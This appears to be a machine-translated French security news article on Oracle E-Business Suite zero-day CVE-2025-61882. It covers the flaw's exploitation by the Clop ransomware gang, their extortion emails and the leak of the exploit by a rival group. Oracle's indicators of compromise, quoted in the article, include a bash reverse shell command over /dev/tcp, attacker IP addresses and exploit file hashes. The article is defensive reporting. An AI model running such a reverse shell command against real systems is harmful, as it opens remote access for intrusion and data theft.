Mise à jour 10/6/25 11h15 HE: Histoire mise à jour avec plus d’informations sur le code source Oracle divulgué et la fuite de l’exploit.

Oracle met en garde contre une vulnérabilité critique de la suite E-Business zero-day identifiée comme CVE-2025-61882 qui permet aux attaquants d’exécuter du code à distance non authentifié, la faille étant activement exploitée dans les attaques de vol de données Clop.

La faille se situe dans le produit de traitement simultané Oracle d’Oracle E-Business Suite (composant: Intégration de l’éditeur BI) et a un score de base CVSS de 9,8, en raison de son manque d’authentification et de sa facilité d’exploitation.

« Cette alerte de sécurité corrige la vulnérabilité CVE-2025-61882 dans Oracle E-Business Suite », lit-on dans un nouvel avis Oracle.

« Cette vulnérabilité est exploitable à distance sans authentification, c’est-à-dire qu’elle peut être exploitée sur un réseau sans avoir besoin d’un nom d’utilisateur et d’un mot de passe. En cas d’exploitation réussie, cette vulnérabilité peut entraîner l’exécution de code à distance. »

Oracle a confirmé que la vulnérabilité zero-day affecte Oracle E-Business Suite, versions 12.2.3-12.2.14, et a publié une mise à jour d’urgence pour corriger la faille.

La société note que les clients doivent d’abord installer la mise à jour du correctif critique d’octobre 2023 avant de pouvoir installer les nouvelles mises à jour de sécurité.

Comme un exploit PoC public existe et que la faille est activement exploitée, il est crucial pour les administrateurs Oracle d’installer la mise à jour de sécurité dès que possible.
Jour zéro exploité dans les attaques de vol de données Clop

Bien qu’Oracle n’ait pas explicitement déclaré qu’il s’agissait d’une vulnérabilité zero-day, ils ont partagé des indicateurs de compromission qui correspondent à un exploit Oracle EBS récemment partagé par des acteurs de la menace sur Telegram.

Charles Carmakal, directeur technique de Mandiant-Google Cloud, a également confirmé que CVE-2025-61882 et d’autres failles corrigées en juillet avaient été exploitées par le gang de ransomwares Clop lors des attaques de vol de données d’août 2025 sur les serveurs Oracle E-Business Suite.

« Clop a exploité de multiples vulnérabilités dans Oracle EBS qui lui ont permis de voler de grandes quantités de données à plusieurs victimes en août 2025 », a déclaré Carmakal sur LinkedIn.

« Plusieurs vulnérabilités ont été exploitées, y compris des vulnérabilités corrigées dans la mise à jour d’Oracle de juillet 2025 ainsi qu’une qui a été corrigée ce week-end (CVE-2025-61882) », a poursuivi Carmakal.

La nouvelle de la dernière campagne d’extorsion de fonds de Clop a éclaté pour la première fois la semaine dernière, lorsque Mandiant et le Google Threat Intelligence Group (GTIG) ont signalé qu’ils suivaient une nouvelle campagne dans laquelle plusieurs entreprises ont reçu des courriels prétendant provenir des acteurs de la menace.

Ces courriels indiquaient que Clop avait volé des données des systèmes Oracle E-Business Suite de l’entreprise et exigeait une rançon pour ne pas divulguer les données volées.

« Nous sommes l’équipe CL0P. Si vous n’avez pas entendu parler de nous, vous pouvez rechercher sur Google à propos de nous sur Internet », lit-on dans l’e-mail d’extorsion partagé avec Breachtrace .

« Nous avons récemment violé votre application Oracle E-Business Suite et copié de nombreux documents. Tous les fichiers privés et autres informations sont désormais conservés sur nos systèmes. »

Courriel d’extorsion de fonds

Le gang d’extorsion Clop exploite depuis longtemps les vulnérabilités zero-day lors d’attaques massives de vol de données, notamment:

  • 2020: Exploitation d’un jour zéro dans la plateforme FTA Accellion, affectant près de 100 organisations.
  • 2021: Exploitation d’un jour zéro dans le logiciel FTP SolarWinds Serv-U.
  • 2023: Exploitation d’un jour zéro dans la plate-forme MFT GoAnywhere, violation de plus de 100 entreprises.
  • 2023: Exploiter un zero-day dans MOVEit Transfer a été la campagne la plus étendue de Clop à ce jour, où un exploit zero-day a permis le vol de données de 2 773 organisations dans le monde entier.
  • 2024: Exploitation de deux jours zéro de transfert de fichiers Cleo (CVE-2024-50623 et CVE-2024-55956) pour voler des données et extorquer des entreprises.

Clop a par la suite confirmé à Breachtrace qu’ils étaient à l’origine des courriels d’extorsion et a indiqué qu’ils exploitaient une vulnérabilité Oracle zero-day pour voler les données.

« Bientôt, il deviendra évident qu’Oracle a mis sur écoute son produit principal et encore une fois, la tâche incombe à clop de sauver la situation », a déclaré Clop à Breachtrace , indiquant qu’une nouvelle faille a été exploitée.

Cependant, Oracle a initialement lié la campagne d’extorsion Clop à des vulnérabilités corrigées en juillet 2025 plutôt qu’au nouveau jour zéro dont nous savons maintenant qu’il a été utilisé dans les attaques.

Oracle a maintenant partagé des indicateurs de compromission pour l’exploitation du jour zéro, qui incluent deux adresses IP vues exploitant des serveurs, une commande pour ouvrir un shell distant et l’archive d’exploitation et les fichiers associés.

  • 200[.]107[.]207[.]26-Adresse IP associée à l’exploitation observée. (Requêtes HTTP GET et POST)
  • 185[.]181[.]60[.]11-Adresse IP associée à l’exploitation observée. (Requêtes HTTP GET et POST)
  • sh-c / bin / bash-i > & / dev / tcp / / 0> & 1-Commande exécutée par exploit pour ouvrir un shell inversé.
  • 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d-oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_ chasseurs.zip (Archive d’exploitation)
  • aa0d3859d6633b62bcfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 – aa0d3859d6633b62bcfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py (Partie de l’exploit)
  • 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b – numéro de pièce oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py (Partie de l’exploit)

Exploit divulgué par des Lapsus épars Hunters Chasseurs

Alors que Clop est à l’origine des attaques de vol de données et de l’exploitation du zero-day Oracle, la nouvelle du zero-day est d’abord venue d’un autre groupe d’acteurs de la menace qui ont récemment fait la une des journaux avec leurs attaques généralisées de vol de données sur les clients Salesforce.

Vendredi, ces acteurs, se faisant appeler « Scattered Lapsus Hunters Hunters » car ils prétendent être composés d’acteurs de menaces de Scattered Spider, Lapsus$ et ShinyHunters, ont divulgué deux fichiers sur Telegram contenant le nom de Clop.

Un fichier nommé « GIFT_FROM_CL0P. 7z » contient du code source Oracle qui semble être lié à « support.oracle.com » basé sur les noms de fichiers. Après avoir publié cette histoire, ShinyHunters a déclaré à Breachtrace que ce code source avait été volé lors d’une violation d’Oracle Cloud en février 2025.

Cependant, les acteurs de la menace ont également publié un  » ORACLE_EBS_NDAY_EXPLOIT_POC_SCATTERED_LAPSUS_RETARD_CL0P_HUNTERS.zip », qu’ils ont insinué par le nom de fichier était l’exploit Oracle E-Business utilisé par Clop.

Exploit Oracle E-Business pour une faille zero-day

Breachtrace a confirmé qu’il s’agissait du même fichier répertorié dans les indicateurs de compromission d’Oracle.

Cette archive contient un readme.md fichier d’instructions et deux scripts Python nommés exp.py et server.py. Ces scripts Python sont utilisés pour exploiter une instance Oracle E-Business Suite vulnérable et exécuter une commande arbitraire ou ouvrir un shell inverse sur les serveurs de l’auteur de la menace.

Comme les IOC partagés par Oracle répertorient le nom de l’archive d’exploit partagée par des chasseurs dispersés de Lapsus$, il est maintenant confirmé qu’il s’agit de l’exploit utilisé par le gang de ransomwares Clop.

Cependant, cela soulève des questions sur la façon dont les acteurs de la menace dispersés Lapsus Hunters Hunters ont eu accès à l’exploit et s’ils travaillent avec Clop dans une certaine mesure.

ShinyHunters a déclaré à Breachtrace qu’ils pensaient qu’une personne avec laquelle le pirate avait partagé l’exploit l’avait peut-être donné ou vendu à Clop.

« C’était mon exploit, tout comme SAP, qui a été volé par le PCC, et cela m’a encore plus bouleversé qu’un autre de mes exploits soit exploité par un autre groupe de manière infructueuse, alors nous l’avons divulgué. Pas de haine pour cl0p », a déclaré ShinyHunters à Breachtrace .

Breachtrace a contacté Clop pour lui poser des questions sur cette relation, mais n’a pas reçu de réponse pour le moment.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *